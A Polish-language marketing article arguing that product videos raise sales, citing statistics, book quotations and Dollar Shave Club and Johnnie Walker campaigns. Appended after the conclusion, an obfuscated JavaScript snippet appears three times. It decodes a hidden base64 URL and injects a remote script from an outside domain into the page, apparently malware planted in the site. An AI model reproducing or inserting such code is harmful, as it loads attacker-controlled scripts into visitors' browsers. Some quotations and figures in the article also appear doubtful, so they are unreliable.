W dobie cyfrowego świata coraz więcej przedsiębiorstw poszukuje skutecznych metod komunikacji z klientami. Jednym z narzędzi, które zyskują na popularności, są filmy reklamowe. Czy warto inwestować w tego rodzaju komunikację? Według badań, aż 84% konsumentów zdecydowało się na zakup produktu lub usługi po obejrzeniu filmu produktowego? (Wyzowl, Video Marketing Statistics 2021). W dzisiejszym świecie, gdzie internet zdominowany jest przez treści wideo, filmy produktowe są potężnym narzędziem, które może realnie zwiększyć sprzedaż.
Czym są filmy produktowe? To krótkie, angażujące wizualnie materiały, które mają na celu promowanie produktów, usług lub marki. Film to medium, które w ostatnich latach stało się niezwykle popularne w marketingu. Filmy produktowe są jednym z najskuteczniejszych narzędzi do promocji produktów i usług. Zgodnie z badaniami, filmy produktowe zwiększają konwersję nawet o 80% i mogą zwiększyć średni czas spędzony na stronie o 2 minuty. 85% konsumentów wskazało, że oglądanie filmów produktowych pomaga w podejmowaniu decyzji zakupowych. Filmy produktowe pomagają w zobrazowaniu produktu lub usługi, co ułatwia klientom zrozumienie, jak produkt może działać dla nich. W ten sposób skracają czas podejmowania decyzji zakupowej. Jak mówi Jon Mowat w swojej książce “Video Marketing Strategy”: “Filmy produktowe pomagają wytłumaczyć klientom, jak korzystać z produktów i usług i zachęcają do ich zakupu”.
Filmy produktowe można łatwo udostępniać i umieszczać na różnych platformach, takich jak strona internetowa, media społecznościowe, YouTube i wiele innych lub wysyłać bezpośrednio do swoich klientów. Dzięki temu mogą dotrzeć do szerszej publiczności i zwiększyć widoczność marki. Pozwalają też przejrzyście opowiedzieć historię produktu, co jest kluczowe w budowaniu marki i zwiększaniu jej rozpoznawalności. Jak pisze Jon Mowat: “Filmy mogą pomóc w przekazaniu wartości marki oraz wytłumaczeniu klientom, jak korzystać z produktów i usług”. W ten sposób marka staje się bardziej atrakcyjna i spójna.
Jak piszą Cole Nussbaumer Knaflic w książce “Storytelling with Data”: “Filmy produktowe mogą pomóc w przekazywaniu informacji o produkcie w sposób bardziej przekonujący i efektywny”. Film może wywołać emocje u klienta, co wpłynie na jego pozytywne wrażenie o produkcie lub usłudze.
Jednym z przykładów sukcesu w wykorzystaniu filmów produktowych jest firma Dollar Shave Club, która w 2012 roku stworzyła film promujący swoje produkty. Film, który przedstawiał humorystyczny opis procesu golenia, zyskał ponad 26 milionów wyświetleń na YouTube i przyciągnął tysiące nowych klientów. Według założyciela firmy, Michaela Dubina, film pomógł w zwiększeniu sprzedaży o 6000% w ciągu pierwszych 6 miesięcy. Film pomógł firmie w szybkim zdobyciu setek tysięcy klientów i ostatecznie doprowadził do przejęcia przez Unilever za 1 miliard dolarów.
Kolejnym przykładem sukcesu w wykorzystaniu filmów reklamowych jest firma Johnnie Walker, która w 2013 roku stworzyła film reklamowy “Keep Walking Brazil”, który przedstawiał historię kibiców brazylijskiej drużyny piłkarskiej Corinthians. Film zyskał ponad 2 miliony wyświetleń w ciągu pierwszych 24 godzin i przyciągnął tysiące nowych klientów. Według badań sprzedaż whisky Johnnie Walker wzrosła o 48% w Brazylii w ciągu pierwszych sześciu miesięcy po publikacji filmu.
Zgodnie z badaniami HubSpot z 2020 roku, 64% konsumentów preferuje oglądanie filmów produktowych w porównaniu z innymi formami reklamy. Ponadto, 88% marketerów stwierdza, że filmy produktowe są skuteczne w przyciąganiu uwagi klientów.
Zgodnie z badaniami Google, klienci, którzy oglądają film reklamowy, mają o 2 razy większą szansę na zakup produktu lub usługi w porównaniu z klientami, którzy nie oglądają filmów produktowych. Filmy reklamowe pozwalają na opowiedzenie historii marki, co pomaga w budowaniu zaangażowania klientów i zwiększeniu lojalności. Według badań Nielsen, klienci, którzy widzą film reklamowy, mają większą skłonność do dzielenia się nim z innymi w porównaniu z innymi formami reklamy.
Podsumowując, filmy produktowe są niezwykle skutecznym narzędziem w marketingu, które pomaga w skracaniu czasu podejmowania decyzji zakupowych, zwiększaniu zasięgu, opowiadaniu historii produktu, wywoływaniu emocji i budowaniu marki. Przykłady takich firm jak Dollar Shave Club czy Johnnie Walker pokazują, jak skuteczne mogą być filmy produktowe w zwiększaniu sprzedaży. Statystyki potwierdzające skuteczność filmów produktowych są niezaprzeczalne, co świadczy o tym, że warto inwestować w ten rodzaj marketingu. Jak pisze Jon Mowat: “Nie wykorzystanie wideo w dzisiejszych czasach jest niemal takie samo jak nieposiadanie strony internetowej kilka lat temu”.
(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();